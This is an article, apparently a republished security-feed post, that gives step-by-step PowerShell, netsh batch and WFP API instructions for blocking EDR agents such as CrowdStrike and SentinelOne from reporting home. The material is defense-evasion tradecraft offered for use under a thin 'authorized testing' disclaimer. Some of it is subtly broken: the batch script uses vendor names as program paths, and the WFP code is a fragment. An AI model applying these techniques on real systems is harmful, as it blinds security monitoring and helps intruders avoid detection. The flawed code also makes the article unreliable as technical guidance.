Bypassing EDR: How to Block EDR Traffic Using Windows Firewall and WFP

Listen to this Post

Featured Image

Introduction

Endpoint Detection and Response (EDR) solutions are critical for enterprise security but can sometimes hinder penetration testers and red teamers. Ethical hackers often need to bypass EDR for authorized security assessments. This article explores two powerful methods—Windows Firewall and Windows Filtering Platform (WFP)—to block EDR traffic, inspired by the EDRSilencer project.

Learning Objectives

  • Understand how EDR solutions monitor system activity.
  • Learn to block EDR traffic using Windows Firewall rules.
  • Master Windows Filtering Platform (WFP) techniques to disrupt EDR communication.

You Should Know

1. Blocking EDR via Windows Firewall

EDR tools often communicate with external servers for threat intelligence. Blocking these connections can prevent detection.

Command:

New-NetFirewallRule -DisplayName "BlockEDR" -Direction Outbound -Program "C:\Path\To\EDR\Agent.exe" -Action Block

Step-by-Step Guide:

1. Open PowerShell as Administrator.

  1. Use the `New-NetFirewallRule` cmdlet to create an outbound block rule.
  2. Replace `”C:\Path\To\EDR\Agent.exe”` with the actual EDR agent path.

4. Verify the rule is active with:

Get-NetFirewallRule -DisplayName "BlockEDR"

This prevents the EDR agent from phoning home while keeping other network functions intact.

  1. Disrupting EDR with Windows Filtering Platform (WFP)
    WFP operates at a lower level than the firewall, allowing deeper traffic control.

Command (C++ WFP API Example):

FWPM_FILTER_CONDITION0 cond = { 0 };
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
cond.conditionValue.byteBlob = (FWP_BYTE_BLOB)appBlob;

Step-by-Step Guide:

  1. Use the Windows Filtering Platform API to create a filter.
  2. Target the EDR process by its Application ID (ALE_APP_ID).
  3. Compile and deploy the filter to drop all outbound traffic from the EDR.

3. Identifying EDR Processes

Before blocking, you must locate the EDR process.

Command (PowerShell):

Get-Process | Where-Object { $_.Company -like "EDR_Vendor" } | Select-Object Name, Id, Path

Step-by-Step Guide:

1. Run the command to list all processes.

  1. Filter by the EDR vendor name (e.g., “CrowdStrike” or “SentinelOne”).
  2. Note the process name and path for firewall/WFP rules.

4. Testing EDR Bypass Effectiveness

After applying rules, verify if EDR is truly blocked.

Command (Check Network Connections):

Get-NetTCPConnection -OwningProcess (Get-Process -Name "EDR_Process").Id

Step-by-Step Guide:

1. Run the command to check active connections.

  1. If no connections appear, the EDR is successfully blocked.

5. Automating EDR Evasion with Scripts

For red teaming, automation is key.

Command (Batch Script to Block Multiple EDRs):

@echo off
for %%A in ("CrowdStrike", "CarbonBlack", "SentinelOne") do (
netsh advfirewall firewall add rule name="Block_%%A" dir=out program="%%A" action=block
)

Step-by-Step Guide:

1. Save the script as `block_edr.bat`.

  1. Run as Administrator to apply firewall rules for multiple EDRs.

What Undercode Say

  • Key Takeaway 1: EDR evasion is crucial for ethical hacking but must only be used in authorized engagements.
  • Key Takeaway 2: Windows Firewall and WFP provide different levels of control—WFP is stealthier but more complex.

Analysis:

While these techniques are powerful, misuse can lead to severe legal consequences. Always obtain proper authorization before testing EDR bypass methods. Additionally, modern EDRs may detect such disruptions, so continuous research is needed.

Prediction

As EDR solutions evolve, they will likely incorporate behavioral analysis to detect firewall/WFP tampering. Future bypass methods may require kernel-level manipulation or AI-driven evasion techniques. Ethical hackers must stay ahead by understanding both offensive and defensive advancements.

For further learning, check out the original EDRSilencer project and advanced courses like CEPT by Altered Security.

🔗 GitHub Project: https://lnkd.in/e4gnB2p8

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jony Schats – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky